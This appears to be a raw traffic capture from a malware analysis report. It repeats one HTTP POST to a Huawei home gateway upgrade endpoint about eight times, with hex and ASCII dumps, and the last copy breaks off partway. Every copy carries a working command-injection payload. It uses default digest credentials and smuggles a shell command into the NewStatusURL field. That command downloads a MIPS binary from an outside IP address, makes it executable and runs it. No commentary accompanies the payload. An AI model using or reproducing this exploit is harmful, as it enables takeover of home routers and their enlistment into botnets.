      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 